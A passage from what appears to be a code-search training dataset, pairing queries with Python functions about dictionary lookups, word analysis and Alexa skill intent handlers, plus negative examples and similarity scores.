self.app.get('/words/1.0/rhyme/' + input_word, follow_redirects=True, headers=self.headers)", "def get_person_text(self, uid):\n words = \"\"\n\n query = \"\"\"\nSELECT ?overview ?researchO ?label\nWHERE\n{\n <%s> <http://vivoweb.org/ontology/core#overview> ?overview .\n <%s> <http://vivoweb.org/ontology/core#researchOverview> ?researchO .\n <%s> <http://www.w3.org/2000/01/rdf-schema#label> ?label .\n}\n \"\"\" % (uid, uid, uid)\n self.setQuery(query)\n try:\n rval = self.query()\n try:\n g = rval.convert()\n except:\n pass\n words = \"%s %s %s\" % (g['results']['bindings'][0]['overview']['value'], g['results']['bindings'][0]['researchO']['value'], g['results']['bindings'][0]['label']['value'])\n except:\n print \"Select failed: %s\" % query\n\n self.setQuery(\"\"\"\nPREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX vivo: <http://vivoweb.org/ontology/core#>\nPREFIX xsd: <http://www.w3.org/2001/XMLSchema#>\nSELECT ?name\nWHERE\n{\n ?auth vivo:relates <%s> .\n ?auth rdf:type vivo:Authorship .\n ?auth vivo:relates ?art .\n filter (?art!=<%s>) .\n ?art <http://vivoweb.org/ontology/core#dateTimeValue> ?date .\n ?date <http://vivoweb.org/ontology/core#dateTime> ?year .\n filter (?year>\"2009-01-01T00:00:00Z\"^^xsd:dateTime) .\n ?art rdfs:label ?name .\n}\nLIMIT 20\n\"\"\" % (uid, uid))\n try:\n rval = self.query()\n try:\n g = rval.convert()\n except:\n pass\n for t in g['results']['bindings']:\n words = words + \" \" + t['name']['value']\n\n except:\n print \"Select failed\"\n traceback.print_exc(file=sys.stdout)\n\n self.setQuery(\"\"\"\nPREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX vivo: <http://vivoweb.org/ontology/core#>\nPREFIX xsd: <http://www.w3.org/2001/XMLSchema#>\n\nSELECT ?name\nWHERE\n{\n ?grant vivo:relates <%s> .\n ?grant rdf:type vivo:Grant .\n ?grant <http://vivoweb.org/ontology/core#dateTimeInterval> ?date .\n ?date <http://vivoweb.org/ontology/core#end> ?end .\n ?end <http://vivoweb.org/ontology/core#dateTime> ?year .\n filter (?year>\"2009-01-01T00:00:00Z\"^^xsd:dateTime) .\n ?grant rdfs:label ?name .\n}\n\n \"\"\" % (uid))\n try:\n rval = self.query()\n try:\n g = rval.convert()\n except:\n pass\n\n for t in g['results']['bindings']:\n words = words + \" \" + t['name']['value']\n\n except:\n print \"Select failed\"\n traceback.print_exc(file=sys.stdout)\n\n\n\n\n return words", "def lookup(name):", "def lookup(name):", "def get_word_context(word):\r\n\tfor content, profile in word_context_profile:\r\n\t\tif word == content:\r\n\t\t\treturn profile \r\n\treturn 0", "def analyze_words(self):\n\t\t\n\t\tword_analysis = {}\n\t\tfor word in self.word_list:\n\t\t\tif word not in word_analysis:\n\t\t\t\tacademic = (word in LEMMA_DICT)\n\t\t\t\tlength = len(word)\n\t\t\t\tfrequency = len(self.word_list[word])\n\t\t\t\tstem = word\t\n\t\t\t\tword_location_index = len(self.sentence_index)-1 #first set it as the last index\n\t\t\t\t\n\t\t\t\tfor index, sentence in self.sentence_index.items():\n\t\t\t\t\tif word in sentence.split():#need to be individual words, not parts of a word\n\t\t\t\t\t\tword_location_index = index \n\t\t\t\t\t\tbreak\n\t\t\t\t\tif self.word_list[word][0] in sentence.split():#accounts for words with upper cases\n\t\t\t\t\t\tword_location_index = index\n\t\t\t\t\t\n\t\t\t\t#selection critera\n\t\t\t\tif academic:\n\t\t\t\t\tselection_criteria = 'academic word'\n\t\t\t\telif frequency > 1: \n\t\t\t\t\tselection_criteria = 'high frequency'\n\t\t\t\telse:\n\t\t\t\t\tselection_criteria = 'word length'\n\n\t\t\t\tword_analysis[word] = (academic, length, frequency, stem, word_location_index, selection_criteria)\n\t\t\n\t\tself.word_analysis = word_analysis\n\t\t\n\t\treturn self.word_analysis", "def replace_similar_sound(word):\n for (key, value) in SIMILAR.items():\n if word in value:\n return str(key)\n raise Exception('No similar sound was found')", "def similarWords(targetWordList,targetWord):\n print(\"\\n\" + \"Similar words for '\" + targetWord + \"': \")\n text = nltk.Text(targetWordList)\n print(text.similar(targetWord))", "def define(word: str):\n try:\n r = requests.get(\"http://www.urbandictionary.com/define.php?term={}\".format(word)) # goes to link for word\n soup = BeautifulSoup(r.content, features=\"html.parser\") # sets up soup\n def_header = \"**\" + soup.find(\"div\", attrs={\"class\": \"def-header\"}).text.replace(\"unknown\",\n \"\") + \"**\"\n # header is the word we are defining\n meaning = soup.find(\"div\", attrs={\"class\": \"meaning\"}).text # gets the definition\n for x in [1, 2, 3, 4, 5, 6, 7, 8, 9]:\n meaning = meaning.replace(str(x) + \". \", \"\\n\" + str(x) + \". \")\n meaning = \"```\" + meaning + \"```\"\n example = soup.find(\"div\", attrs={\"class\": \"example\"}).text # gets the example\n for x in [1, 2, 3, 4, 5, 6, 7, 8, 9]:\n example = example.replace(str(x) + \". \", \"\\n\" + str(x) + \". \")\n output = def_header + \": \" + meaning + \" \" + \"\\nExample: \" + \"```\" + example + \"```\" # output string\n output = output.replace(\"&apos\", \"'\") # replaces weird formatting of ' from original\n return output # returns the word, defintion, and example\n except AttributeError:\n return \"No results\"", "def aux_lemma(word):\n if re.match(r\"(does|did|doing)\", word):\n return (\"do\")\n elif re.match(r\"(had|has|'ve|having)\", word):\n return (\"have\")\n elif re.match(r\"(is|are|am|was|were|been|'s|being)\", word):\n return (\"be\")\n elif word == (\"'d\"):\n return (\"would\")\n else:\n return word.lower()", "def token_to_alias(raw_text, vocab):\n pass", "def word_of_the_day():\n r = requests.get(\"http://www.urbandictionary.com\") # link is always homepage\n soup = BeautifulSoup(r.content, features=\"html.parser\") # sets up soup\n def_header = \"**\" + soup.find(\"div\", attrs={\"class\": \"def-header\"}).text.replace(\"unknown\",\n \"\") + \"**\" # header is the word we are defining\n # def_header = def_header[0:len(def_header) - 10] # header always ends in \"unknown\" this removes it\n meaning = soup.find(\"div\", attrs={\"class\": \"meaning\"}).text # gets the definition\n # formatting TODO move to controller\n for x in [1, 2, 3, 4, 5, 6, 7, 8, 9]:\n meaning = meaning.replace(str(x) + \". \", \"\\n\" + str(x) + \". \")\n for x in [\"v.\", \"n.\"]:\n meaning = meaning.replace(x, x.upper()[:-1])\n example = soup.find(\"div\", attrs={\"class\": \"example\"}).text # gets the example\n output = def_header + \": \" + \"```\" + meaning + \"\\nEx: \" + example + \"```\" # output string\n output = output.replace(\"&apos\", \"'\") # replaces weird formatting of ' from original\n return output # returns the word, defintion, and example", "def spell_a_word(cls, voice_transcript, skill, **kwargs):\n tags = cls._extract_tags(voice_transcript, skill['tags'])\n for tag in tags:\n reg_ex = re.search(tag + ' ([a-zA-Z]+)', voice_transcript)\n try:\n if reg_ex:\n search_text = reg_ex.group(1)\n for letter in search_text:\n cls.response(letter)\n time.sleep(2)\n except Exception as e:\n logging.debug(e)\n cls.response(\"I can't spell the word\")", "def search(self, word):\n return self.subsearch(self.root, word)", "def __call__(self, word):\n return self.parse_request(self.request(f\"https://www.dictionaryapi.com/api/v3/references/collegiate/json/{word}?key={self.apikey}\"), word)", "def get_dictionary_response(word):\r\n word_metadata = {}\r\n definition = \"sorry, no definition is available right now.\"\r\n example = \"sorry, no examples are available right now.\"\r\n synonyms = [\"sorry, no synonyms are available right now.\"]\r\n antonyms = [\"sorry, no antonyms are available right now.\"]\r\n api_key = os.getenv(\"KEY_THESAURUS\")\r\n url = f\"https://www.dictionaryapi.com/api/v3/references/thesaurus/json/{word}?key={api_key}\"\r\n response = requests.get(url)\r\n api_response = json.loads(response.text)\r\n if response.status_code == 200:\r\n for data in api_response:\r\n try:\r\n if data[\"meta\"][\"id\"] == word:\r\n try:\r\n if len(data[\"meta\"][\"syns\"]) != 0:\r\n synonyms = data[\"meta\"][\"syns\"][0]\r\n if len(data[\"meta\"][\"ants\"]) != 0:\r\n antonyms = data[\"meta\"][\"ants\"][0]\r\n for results in data[\"def\"][0][\"sseq\"][0][0][1][\"dt\"]:\r\n if results[0] == \"text\":\r\n definition = results[1]\r\n if results[0] == \"vis\":\r\n example = results[1][0][\"t\"].replace(\"{it}\", \"*\").\\\r\n replace(\"{/it}\", \"*\")\r\n except KeyError as e:\r\n print(e)\r\n except TypeError as e:\r\n print(e)\r\n break\r\n word_metadata[\"meaning\"] = definition\r\n word_metadata[\"example\"] = example\r\n word_metadata[\"antonyms\"] = antonyms\r\n word_metadata[\"synonyms\"] = synonyms\r\n return word_metadata", "def getDisambiguatedByNextNoun(self, word):\n\t\treturn disambig_const.DISAMBIGUATATION_TABLE.get(word, {}).get('noun', {}).get('vocalized', word);", "def get_most_informative_word(self, documents, vocabulary):\n most_informative_word = None\n most_informative_word_gain = 0\n for word in vocabulary:\n gain = self.get_information_gain(word, documents)\n if most_informative_word == None or gain >= most_informative_word_gain:\n most_informative_word = word\n most_informative_word_gain = gain\n return most_informative_word", "def get_new_word(key, chains):\n values = chains[key]\n return choice(values)", "def findWords(self, var, vartype):\n vartext = var.get().lstrip()\n if vartype == 'cat':\n # looking up the words from a category\n SQLquery = 'SELECT word FROM words WHERE category IN \\\n (SELECT lowerlevel FROM cathierarchy WHERE upperlevel=?)'\n elif vartype == 'subcat':\n # looking up the words from a subcategory\n SQLquery = 'SELECT word FROM words WHERE category=?'\n\n with sqlite3.connect(self.dbpath) as conn:\n cursor = conn.cursor()\n cursor.execute(SQLquery, (vartext,))\n find = cursor.fetchall()\n find = tools.listOfTuplesToList(find)\n return self._mySort(find)", "def translate(self, word, context=None, pos_tag=None):\n #Get contextual translation from google translate\n par = {\"text\": word, \"raw\": \"raw\"}\n r = requests.post(self.translation_url, data=par)\n results = r.text\n translated_word = get_from_html_text(results, 'TRANSLATED_TEXT')\n \n #Perform lookup in the text file from the C# translator\n #if there is no match, take the best match from the bing file\n# print \"Translated: \", word, \" ->\", translated_word\n return translated_word", "def getWord(self, word, useCanonical=None, includeSuggestions=None, ):\n\n # Parse inputs\n resourcePath = '/word.{format}/{word}'\n resourcePath = resourcePath.replace('{format}', 'json')\n method = 'GET'\n\n queryParams = {}\n headerParams = {}\n\n queryParams['useCanonical'] = self.apiClient.toPathValue(useCanonical)\n queryParams['includeSuggestions'] = self.apiClient.toPathValue(includeSuggestions)\n\n\n if word != None:\n resourcePath = resourcePath.replace('{word}', word)\n\n\n # Make the API Call\n response = self.apiClient.callAPI(resourcePath, method, queryParams,\n None, headerParams)\n if not response:\n return None\n\n # Create output objects if the response has more than one object\n responseObject = self.apiClient.deserialize(response,\n model.WordObject.WordObject)\n return responseObject", "def test_refersto_multi_word_no_quotes_no_index(self):\n inv_search = 'refersto:\"s parke\"'\n spi_search = 'find refersto s parke'\n self._compare_searches(inv_search, spi_search)" ]
[ "0.71993554", "0.6819215", "0.6670339", "0.6578899", "0.6435337", "0.6270199", "0.6232829", "0.6166652", "0.61357725", "0.60544753", "0.59272295", "0.59103805", "0.59084", "0.59001476", "0.58918864", "0.58608", "0.5855626", "0.5844507", "0.58381885", "0.58219075", "0.58169264", "0.58109945", "0.5802205", "0.5796834", "0.5750214", "0.5730169", "0.5729431", "0.5718449", "0.5718129", "0.5718129", "0.5699858", "0.56992894", "0.56968945", "0.56932884", "0.56921273", "0.56857", "0.56713974", "0.5666982", "0.5652448", "0.5648445", "0.5647", "0.5643668", "0.56411403", "0.5634968", "0.5631329", "0.5631214", "0.56301636", "0.56301636", "0.56301636", "0.5624995", "0.56233877", "0.5620168", "0.5614202", "0.5609905", "0.56077033", "0.55981064", "0.5596738", "0.5596687", "0.5592517", "0.55899936", "0.5589221", "0.55845845", "0.5582841", "0.55824983", "0.55800176", "0.5577813", "0.55748934", "0.55688834", "0.5566336", "0.5556202", "0.55463964", "0.554337", "0.55384725", "0.55326366", "0.55293936", "0.5527786", "0.5522661", "0.55216867", "0.55208766", "0.5516905", "0.5512751", "0.5512751", "0.55126333", "0.55062807", "0.54989403", "0.5498006", "0.548938", "0.54880023", "0.5485214", "0.5483119", "0.54768866", "0.5471828", "0.54712313", "0.5467567", "0.54638344", "0.54613495", "0.54599106", "0.5458539", "0.5457968", "0.5457365", "0.54478186" ]
0.0
-1
AMAZON.FallbackIntent is only available in enUS locale. This handler will not be triggered except in that locale, so it is safe to deploy on any locale.
def fallback_handler(handler_input): # type: (HandlerInput) -> Response speech = ( "The {} skill can't help you with that. " "I can look up a word in the dictionary for you").format(skill_name) reprompt = ("I can look up a word in the dictionary, " "Just say any word in English") handler_input.response_builder.speak(speech).ask(reprompt) return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def fall_back_message():\r\n card_title = \"Fallback Message\"\r\n fallback_string = \"Sorry. I couldn't understood it. Please say again.\"\r\n should_end_session = False\r\n session_attributes = { \r\n \"speech_output\": fallback_string,\r\n \r\n \r\n }\r\n\r\n return build_response(session_attributes, build_speechlet_response(card_title, fallback_string, \"Ask me to say hello...\", should_end_session))", "def _fallback_range(self, utterances, lang, message, fb_range):\n msg = message.reply(\n 'mycroft.skills.fallback',\n data={'utterance': utterances[0][0],\n 'lang': lang,\n 'fallback_range': (fb_range.start, fb_range.stop)}\n )\n response = self.bus.wait_for_response(msg, timeout=10)\n if response and response.data['handled']:\n ret = IntentMatch('Fallback', None, {}, None)\n else:\n ret = None\n return ret", "def get_fallback_response():\n\n speech_output = FALLBACK_MESSAGE\n return response(speech_response(speech_output, False))", "def get_fallback_response():\n\n speech_output = FALLBACK_MESSAGE\n return response(speech_response(speech_output, False))", "def fallback_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech = (\n \"The Transit Time skill can't help you with that. \"\n \"You can ask when the next bus is coming!\")\n reprompt = \"You can ask when the next bus is arriving!\"\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def fallback(self):\n pass", "def fallback(self):\n pass", "def get_fallback_url(self, request):\n tail = self.fallback_url or \"/\"\n if not tail.startswith(\"/\"):\n tail = \"/\" + tail\n return \"/\" + get_best_culture(request, self.name) + tail", "def fallback_handler(handler_input):\n speech_text = \"See you later! Enjoy the hackathon.\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Hello World\", speech_text)).set_should_end_session(\n True)\n return handler_input.response_builder.response", "def _load_transliterated_regional(self):\n# global approved, conflicts, suggestions, unknown, cldr, current\n start = self.lblFallback['text'].find('=>') + 2\n if self.lblFallback['text'][start:]:\n self.preferred.set(\\\n self._transliterate_text(self.lblFallback['text'][start:]))\n pass", "def fallback_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech = (\n \"The {} skill can't help you with that. \"\n \"You can tell me your favorite color by saying, \"\n \"my favorite color is red\").format(skill_name)\n reprompt = (\"You can tell me your favorite color by saying, \"\n \"my favorite color is red\")\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def fallback_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech = (\n \"The {} skill can't help you with that. \"\n \"You can tell me your favorite color by saying, \"\n \"my favorite color is red\").format(skill_name)\n reprompt = (\"You can tell me your favorite color by saying, \"\n \"my favorite color is red\")\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def fallback(self, kw):\n print(self.fallback_text.format(kw))\n return self.ask()", "def fallback_trans(x):\r\n t = _(x)\r\n if t == x:\r\n l = h.get_lang()\r\n h.set_lang('en', graceful_fail = True)\r\n t = _(x)\r\n if l and l[0] != 'en':\r\n h.set_lang(l[0])\r\n return t", "def fallback_handler(handler_input):\n # type: (HandlerInput) -> Response\n session_attr = handler_input.attributes_manager.session_attributes\n\n speech_text = (\n \"The {} skill can't help you with that.\".format(SKILL_NAME))\n\n handler_input.response_builder.speak(\n speech_text).set_should_end_session(False)\n return handler_input.response_builder.response", "def on_intent(intent_request, session):\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n # intents_object = get_custom_intents()\n print (\"************\")\n print (intent_request)\n # fall_back = True\n # final_function = ''\n # for temp_intent in intents_object:\n # if temp_intent == intent_name:\n # fall_back = False\n # final_function = temp_intent[1]\n # break\n # if(fall_back):\n # return custom_handlers.get_fallback_msg()\n # else:\n # return final_function(intent, session)\n \n # Dispatch to your skill's intent handlers\n if intent_name == \"welcome_intent\":\n return custom_handlers.get_welcome_msg(intent, session)\n elif intent_name == \"search_intent\":\n return custom_handlers.get_search_msg(intent, session)\n elif intent_name == \"architecture\":\n return custom_handlers.get_architecture_msg(intent, session)\n elif intent_name == \"saybye\":\n return custom_handlers.get_saybye_response(intent, session)\n elif intent_name == \"myname\":\n return custom_handlers.get_myname_response(intent, session)\n elif intent_name == \"ask\":\n return custom_handlers.get_ask_response(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return custom_handlers.get_welcome_response(intent, session)\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return custom_handlers.handle_session_end_request(intent, session)\n else:\n return custom_handlers.get_fallback_msg(intent, session)", "def testAudioFallback(self):\n if self.audioFallback in tools.AUDIO_FALLBACKS:\n self.assertEqual(\n self.audioFallback,\n self.config.audioFallback\n )\n else:\n self.assertNotEqual(\n self.audioFallback,\n self.config.audioFallback\n )\n self.assertEqual(\n tools.AUDIO_FALLBACK_DEFAULT,\n self.config.audioFallback\n )", "def use_en(self):\n pass", "def _load_regional(self):\n# global approved, conflicts, suggestions, unknown, cldr, current\n start = self.lblFallback['text'].find('=>') + 2\n if self.lblFallback['text'][start:]:\n self.preferred.set(self.lblFallback['text'][start:])\n pass", "def test_fallback_language_no_current(self):\n x = SimpleModel()\n x.set_current_language(self.conf_fallback)\n x.tr_title = \"TITLE_FALLBACK\"\n\n self.assertEqual(\n x.safe_translation_getter(\"tr_title\", language_code=self.other_lang1), \"TITLE_FALLBACK\"\n )", "def setFontFallback(self,value):\n self.PDFreactorConfiguration.in1[\"fontFallback\"] = value", "def adaptPythonToNeutral(self, *args):\n return _SALOMERuntime.RuntimeSALOME_adaptPythonToNeutral(self, *args)", "def on_intent(request, session):\n\n intent_name = request['intent']['name']\n\n # process the intents\n if intent_name == \"comenzar\":\n return get_fact_response()\n elif intent_name == \"otravez\":\n return get_fact_response()\n elif intent_name == \"AMAZON.YesIntent\":\n return get_fact_response()\n elif intent_name == \"AMAZON.NoIntent\":\n return get_stop_response()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_help_response()\n elif intent_name == \"AMAZON.StopIntent\":\n return get_stop_response()\n elif intent_name == \"AMAZON.CancelIntent\":\n return get_stop_response()\n elif intent_name == \"AMAZON.FallbackIntent\":\n return get_fallback_response()\n else:\n print(\"invalid Intent reply with help\")\n return get_help_response()", "def on_intent(intent_request, session):\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"CountryStatusIntent\":\n return get_country_info(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_start_end_response(False)\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return get_start_end_response(True)\n else:\n return get_start_end_response(False)", "def on_intent(event):\n\n intent = event[\"request\"][\"intent\"][\"name\"]\n\n if intent in (\"AMAZON.CancelIntent\", \"AMAZON.StopIntent\", \"AMAZON.NoIntent\"):\n return handle_session_end_request()\n\n if intent == \"AMAZON.YesIntent\":\n if \"attributes\" in event[\"session\"] and \"previousIntent\" in \\\n event[\"session\"][\"attributes\"]:\n\n if event[\"session\"][\"attributes\"][\"previousIntent\"] == \"AMAZON.HelpIntent\":\n return main_handler(event)\n\n speech_output = event[\"session\"][\"attributes\"][\"nextStations\"]\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)\n\n speech_output = \"Sorry, something went wrong.\"\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)\n\n if intent == \"isBikesAvailable\":\n return main_handler(event)\n\n if intent == \"AMAZON.HelpIntent\":\n return handle_help_intent()\n\n speech_output = \"Sorry, I don\\'t know that.\"\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)", "def _register_intent_services(bus):\n service = IntentService(bus)\n # Register handler to trigger fallback system\n bus.on(\n 'mycroft.skills.fallback',\n FallbackSkill.make_intent_failure_handler(bus)\n )\n return service", "def unhandled_intent_handler(handler_input):\n # type: (HandlerInput) -> Response\n intent_name = get_intent_name(handler_input)\n if intent_name == 'ChallengeBossIntent':\n speech_text = 'You need to be in the boss room to challenge the boss. '\n elif intent_name == 'EnterMazeIntent':\n speech_text = 'You already have a maze in progress. Would you like to resume the maze or discard the maze? '\n elif intent_name == 'ResumeMazeIntent' or intent_name == 'DiscardMazeIntent':\n speech_text = 'You are already in a maze or you don\\'t have a maze in progress. Say enter the maze or discard the maze. '\n elif intent_name == 'LocationIntent':\n speech_text = 'You need to be in a maze to locate yourself. Say enter the maze or resume the maze. '\n elif intent_name == 'MoveIntent':\n speech_text = 'You need to be in a maze to take a move. Say enter the maze or resume the maze. '\n else:\n speech_text = 'I am not sure what you are saying. '\n\n handler_input.response_builder.speak(\n speech_text).set_should_end_session(False)\n return handler_input.response_builder.response", "def adaptNeutralToPython(self, *args):\n return _SALOMERuntime.RuntimeSALOME_adaptNeutralToPython(self, *args)", "def test_fallback_language(self):\n x = SimpleModel()\n x.set_current_language(self.conf_fallback)\n x.tr_title = \"TITLE_FALLBACK\"\n\n x.set_current_language(self.other_lang1)\n x.tr_title = \"TITLE_XX\"\n x.save()\n\n with translation.override(self.other_lang2):\n x = SimpleModel.objects.get(pk=x.pk)\n self.assertEqual(x.tr_title, \"TITLE_FALLBACK\")", "def handle_answer_request(intent, session):\n\n eins_list = [\"eins\", \"ein\", \"einer\", \"eine\", \"einen\", \"eines\", \"einem\"]\n \n if intent[\"name\"] == \"DontKnowIntent\":\n answer = \"weiß nicht\"\n elif \"Nummer\" in intent[\"slots\"].keys() and \"value\" in intent[\"slots\"][\"Nummer\"]:\n answer = intent[\"slots\"][\"Nummer\"][\"value\"]\n elif \"Antworten\" in intent[\"slots\"].keys() and \"value\" in intent[\"slots\"][\"Antworten\"]:\n answer = intent[\"slots\"][\"Antworten\"][\"value\"]\n else:\n answer = \"Fehler\"\n \n #Necessary to recognize \"1\":\n if answer in eins_list:\n answer = \"1\"\n elif answer == \"ein mal\":\n answer = \"einmal\"\n answer = answer.lower()\n\n print(\"handle_answer_request: \", intent, \"answer: \", answer)\n\n if \"attributes\" not in session:\n return start_game(answer, session)\n elif session[\"attributes\"][\"state\"] == \"Gameon\":\n return check_answer(answer, session)\n elif session[\"attributes\"][\"state\"] == \"Start\":\n return start_game(answer, session)\n\n return start_game(answer, session)", "def test_fallback_values_2(self):\n title1_de = \"title de\"\n text1_de = \"text in german\"\n n = TestModelWithFallback2()\n n.title = title1_de\n n.text = text1_de\n n.save()\n del n\n n = TestModelWithFallback2.objects.get(title=title1_de)\n trans_real.activate(\"en\")\n self.failUnlessEqual(n.title, title1_de)\n self.failUnlessEqual(n.text,\\\n TestTranslationOptionsWithFallback2.fallback_values['text'])", "def adaptCorbaToNeutral(self, *args):\n return _SALOMERuntime.RuntimeSALOME_adaptCorbaToNeutral(self, *args)", "def add_fallback(self, fallback):\n with Translations._cache_lock:\n for key, value in Translations._cache.items():\n if id(self) == id(value):\n del Translations._cache[key]\n break\n if self._fallback:\n self._fallback.add_fallback(fallback)\n else:\n self._fallback = fallback", "def test_fallback_values_1(self):\n title1_de = \"title de\"\n n = TestModelWithFallback()\n n.title = title1_de\n n.save()\n del n\n n = TestModelWithFallback.objects.get(title=title1_de)\n self.failUnlessEqual(n.title, title1_de)\n trans_real.activate(\"en\")\n self.failUnlessEqual(n.title, \"\")", "def handle_unknown_message(event):\n text_message = TextSendMessage(text='無法理解此訊息: \"{}\"'.format(event.message.text))\n line_bot_api.reply_message(event.reply_token, text_message)", "async def _async_process_intent(hass: HomeAssistant, domain: str, platform):\n await platform.async_setup_intents(hass)", "def adaptXmlToNeutral(self, *args):\n return _SALOMERuntime.RuntimeSALOME_adaptXmlToNeutral(self, *args)", "def test_00_i18n_anonymous(self):\r\n # First default 'en' locale\r\n with self.app as c:\r\n err_msg = \"The page should be in English\"\r\n res = c.get('/', headers=[('Accept-Language', 'en')])\r\n assert \"Community\" in res.data, err_msg\r\n # Second with 'es' locale\r\n with self.app as c:\r\n err_msg = \"The page should be in Spanish\"\r\n res = c.get('/', headers=[('Accept-Language', 'es')])\r\n assert \"Comunidad\" in res.data, err_msg", "def on_intent(intent_request, session):\r\n\r\n print(\"on_intent requestId=\" + intent_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n\r\n intent = intent_request['intent']\r\n intent_name = intent_request['intent']['name']\r\n \r\n if intent_name == \"unsafe\":\r\n send_message_alerts()\r\n session_attributes = {}\r\n card_title = \"Welcome, this is Emma\"\r\n speech_output = \"Calling police, Connected with police , Police on the way. Police will be in 1 min . Your relatives and frieds are all informed. Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me\"\r\n \r\n # If the user either does not reply to the welcome message or says something\r\n # that is not understood, they will be prompted again with this text.\r\n reprompt_text = \"Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me \"\r\n \r\n should_end_session = False\r\n return build_response(session_attributes, build_speechlet_response(\r\n card_title, speech_output, reprompt_text, should_end_session))\r\n \r\n \r\n \r\n elif intent_name == \"AMAZON.HelpIntent\":\r\n return get_welcome_response()\r\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\r\n return handle_session_end_request()\r\n else:\r\n raise ValueError(\"Invalid intent\")", "def _default_handler(self, iq):\n raise XMPPError('service-unavailable')", "def fallback_host(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"fallback_host\")", "def fallback_host(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"fallback_host\")", "def test_py2_application_exception_message_unicode_english():\n try:\n raise ValueError(UNICODE_ENGLISH)\n except ValueError:\n app = application()\n notice_error(application=app)", "def localizedWithFallback(field, allowEmpty=True):\n for lang in [''] + FallbackLanguages():\n t = field[lang]\n if allowEmpty:\n if isinstance(t, basestring):\n return t\n elif t:\n return t\n return u\"\"", "def get_english_env(env):\n if sys.platform == 'win32':\n return None\n env = env or os.environ\n\n # Test if it is necessary at all.\n is_english = lambda name: env.get(name, 'en').startswith('en')\n\n if is_english('LANG') and is_english('LANGUAGE'):\n return None\n\n # Requires modifications.\n env = env.copy()\n def fix_lang(name):\n if not is_english(name):\n env[name] = 'en_US.UTF-8'\n fix_lang('LANG')\n fix_lang('LANGUAGE')\n return env", "def _unknown_app(self):\n self.make_unknown()", "def use_zh(self):\n pass", "def on_intent(intent_request, session):\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n # Dispatch to your skill's intent handlers\n if intent_name == \"test\":\n return get_test_response()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"forecast\":\n return get_forecast_response()\n elif intent_name == \"detailedforecast\":\n return get_detailed_forecast_response()\n elif intent_name == \"uscanadaforecast\":\n return get_uscanada_forecast_response()\n elif intent_name == \"detaileduscanadaforecast\":\n return get_detailed_uscanada_forecast_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def fallback(self) -> Fallback:\n return Fallback(self)", "def fallback_host(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"fallback_host\")", "def on_intent(request, session):\n\n intent = request['intent']\n\n print(\"on_intent:\", intent)\n\n if intent[\"name\"] == \"AntwortIntent\":\n return handle_answer_request(intent, session)\n elif intent[\"name\"] == \"DontKnowIntent\":\n return handle_answer_request(intent, session)\n elif intent['name'] == \"AMAZON.RepeatIntent\":\n return handle_repeat_request(intent, session)\n elif intent['name'] == \"AMAZON.StopIntent\" or intent['name'] == \"AMAZON.CancelIntent\":\n return handle_finish_session_request(intent, session)\n elif intent['name'] == \"AMAZON.HelpIntent\":\n return get_help(intent, session)\n elif intent['name'] == \"StartQuizIntent\" or intent['name'] == \"AMAZON.StartoverIntent\":\n if session[\"new\"] == False:\n return get_welcome_message(restart=True)\n #if no intent is identified:\n return get_help(intent, session)", "def test_single_locale_activation(self):\n with translation.override(\"fr\"):\n self.assertEqual(\n self.get_template(\n \"{% load i18n %}{% blocktranslate %}Yes{% endblocktranslate %}\"\n ).render(Context({})),\n \"Oui\",\n )", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In LaunchRequestHandler\")\n lang = handler_input.request_envelope.request.locale\n try:\n speech = welcome_speech[lang]\n except:\n speech = \"Language \" + lang + \" is not supported.\"\n\n handler_input.response_builder.speak(\n speech).ask(help_text)\n return handler_input.response_builder.response", "def adaptNeutralToCpp(self, *args):\n return _SALOMERuntime.RuntimeSALOME_adaptNeutralToCpp(self, *args)", "def test_py3_application_exception_message_unicode_english():\n try:\n raise ValueError(UNICODE_ENGLISH)\n except ValueError:\n app = application()\n notice_error(application=app)", "def test_save_ignore_fallback_marker(self):\n x = SimpleModel()\n x.set_current_language(self.other_lang1)\n x.tr_title = \"TITLE_XX\"\n x.set_current_language(self.other_lang2)\n # try fetching, causing an fallback marker\n 